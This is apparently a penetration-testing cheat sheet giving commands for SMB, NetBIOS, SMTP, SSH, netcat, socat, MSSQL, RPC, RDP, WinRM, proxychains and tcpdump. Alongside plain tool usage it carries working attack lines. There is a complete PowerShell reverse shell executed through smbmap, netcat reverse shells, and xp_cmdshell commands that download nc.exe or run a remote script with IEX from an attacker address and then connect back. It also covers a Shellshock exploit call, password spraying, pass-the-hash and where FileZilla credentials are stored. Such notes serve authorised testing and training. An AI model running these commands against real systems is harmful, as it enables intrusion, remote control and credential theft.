# LIST DIRECTORY CONTENTS
smbmap -u user -p 'password' -r 'C$Users'
# LIST DRIVES
smbmap -u user -p 'password' -L
# EXECUTE COMMAND FOR SHELL
smbmap -u user -p 'password' -d domain -H host -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.1.299""""; $port=""""80"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize ;$p=New-Object System.Diagnostics.Process ;$p.StartInfo.FileName=""""cmd.exe"""" ;$p.StartInfo.RedirectStandardInput=1 ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0 ;$p.Start() ;$is=$p.StandardInput ;$os=$p.StandardOutput ;Start-Sleep 1 ;$e=new-object System.Text.AsciiEncoding ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length) ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else { $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}} $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"'
NBTSCAN
… scans for NetBIOS name information
nbtscan 10.10.1.299
# VERBOSE
-v
# HUMAN READABLE
-vh
# DUMP CONTENTS OF PACKET
-d
# USE FILE FOR MULTIPLE HOSTS
-f addresses.txt
SMTP
PORT 25
… connect and verify accounts
… also remember Shellshock?
nc -C ip 25
VRFY name
EXPN name
# EXAMPLES
VRFY root
EXPN postmaster
EXPN root
# NEVER FORGET ABOUT POSTFIX SHELLSHOCK
python2 postfix-shellshock-nc.py 10.10.1.299 [email protected] 192.168.119.299 443
SSH
PORT 22
… connection protocol common to Linux, used on Windows sometimes
ssh user@ip
# USE A KEY FILE
ssh -i key_file user@ip
# USE SPECIFIC ENCRYPTION
ssh -i key_file -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected]
# POSSIBLE RESTRICTED BASH ESCAPE
ssh [email protected] -t "bash --noprofile"
SMB TRANSFERS
… use SMB to transfer files to your target
… set up an SMB server with SMB v2
# START SERVER
impacket-smbserver -smb2support share ../FOLDER
# ON TARGET, DOWNLOAD FILES
copy \ipsharefile
NETCAT (NC)
… connection tool for bind or reverse shells
nc 10.10.1.299 80
# ENUMERATE A PORT
nc -nv 10.10.1.299 80
# ALTERNATE CONNECTION
nc -nvC 10.10.1.299 80
# REVERSE SHELL
nc 192.168.1.299 -e /bin/bash
nc 192.168.1.299 -e cmd.exe
# LISTENER
nc -nvlp 80
# SEND FILE
nc -l 80 > file.txt. # SENDER
nc server.com 80 < file.txt. # RECEIVER
SOCAT
… extremely capable connection tool
… this is a great read about socat
# SAME AS nc 10.10.1.299 80
socat - TCP:10.10.1.299:80
# LISTEN FOR CONNECTION
socat - TCP-LISTEN:80,crlf
SQSH (SQL)
PORT 1433
… interactive database shell
… remote command execution may also work with authentication
sqsh -S 10.10.1.299 -U sa
# REMOTE COMMAND EXECUTION
# RECONFIGURE / GO REQUIRED AFTER EACH TO EXECUTE
1> exec sp_configure 'show advanced options' ,1
2> reconfigure
3> go
1> exec sp_configure 'xp_cmdshell' ,1
2> reconfigure
3> go
# NOW READY FOR SHELL COMMANDS
1> xp_cmdshell 'whoami'
2> go
1> xp_cmdshell 'PowerShell -ExecutionPolicy Unrestricted -File c:tmpshell.ps1'
2> go
# REVERSE SHELL STRATEGY NETCAT
xp_cmdshell 'powershell invoke-webrequest http://192.168.119.299:443/nc.exe -outfile c:tmpnc.exe'
xp_cmdshell 'c:tmpnc.exe -e C:WindowsSystem32cmd.exe 192.168.119.299 80'
# REVERSE SHELL STRATEGY POWERSHELL
xp_cmdshell 'powershell IEX(New-Object Net.WebClient).downloadString('http://192.168.119.299:443/system.ps1')'
xp_cmdshell 'PowerShell -ExecutionPolicy Unrestricted -File c:tmpshell.ps1'
MYSQL
PORT 3306
… interactive database program for mysql
mysql -u root -p password
# CONNECT TO A HOST
mysql -u root -p password -h host
FTP
PORT 21
… command line ftp program
ftp 10.10.1.299
# FILEZILLA CREDENTIAL LOCATION
# BASE64 ENCODED CREDS
c:Program Files (x86)FileZilla ServerFileZilla Server.xml
PASS THE HASH
… connection tool for kerberos environments
pth-winexe -U WORKGROUP/User%Pass //10.10.1.299 cmd.exe
RCPCLIENT (RPC)
… Remote Procedure Call connection client
rpcclient -U "user" -N 10.10.1.299
# INTERRACT WITHT HE SERVER
enumdomusers
enumdomgroups
querygroup 0x204
querygroupmem 0x204
queryuser 0x3e8
getdompwinfo
getusrdompwinfo 0x44f
# IT IS POSSIBLE TO PASSWORD SPRAY AS WELL
rpcclient -U "user%password" -c "getusername;quit" 10.10.1.299
# failed login shows NT_STATUS_LOGON_FAILURE
# VIEW THE SYSVOL WITH CREDENTIALS
smbclient -U "user%password" \\domain.com\sysvol
REMOTE DESKTOP
PORT 3389
… Windows computers desktop environment
rdesktop 10.10.1.299
# USING CREDENTIALS
rdesktop -u user -p password 10.10.1.299
# SET QUALITY LEVEL WITH 16,24,32 (32 IS HIGHEST)
rdesktop -a 16 10.10.1.299
# CONNECT WITHOUT ENCRYPTION
rdesktop -E 10.10.1.299
# CACHE CONNECTION FOR SPEED (FASTER)
rdesktop -p 10.10.1.299
# ENABLE COMPRESSION (SAVES ON BANDWIDTH)
rdesktop -z 10.10.1.299
# XFREERDP IS ALSO AVAILABLE
xfreerdp +clipboard /u:<username> /v:<hostname>
EVIL-WINRM
… connection shell for WinRM
evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l]
# CONNECT TO A HOST
evil-winrm -u <user> -p <pass> -i <host>
PROXYCHAINS
… a great tool for pivoting networks
… controlled through the /etc/proxychains.conf file
… doesn’t work with all layers in the OSI model (like ping)
# PLACE THE COMMAND BEFORE THE TOOL
proxychains nmap 10.10.1.229
SMBCLIENT
… similar to an FTP client for file sharing
smbclient -L host
smbclient \\[ip]\[share name]
smbclient \\10.10.1.299\wwwroot
smbclient \\10.10.1.299\"User Share"
# UPLOAD FILE EXAMPLE
smbclient \\website.com\RedirectedFolders$ -c 'cd userDownloads ; put test.txt test.txt' -U user
NETSTAT
… gather network statistics
… used to confirm connections (especially in network pivots)
netstat [options]
# LIST ALL PORTS AND CONNECTIONS
netstat -a
# TCP PORTS
netstat -at
# UDP PORTS
netstat -au
# LISTENING PORTS
netstat -l
# LIST STATISTICS
netstat -s
# NETWORK INTERFACE TRANSACTIONS
netstat -i
# LIST LISTENING PROGRAMS
netstat -lp
# LIST CONTINUOUSLY
netstat -ic
# COMMON USE FOR ENUMERATION
netstat -antup
TCPDUMP
… use tcpdump to record traffic if able
… this may reveal LDAP or other account data
/usr/sbin/tcpdump -i any -U -w - 'not port 22' > tcpdump.cap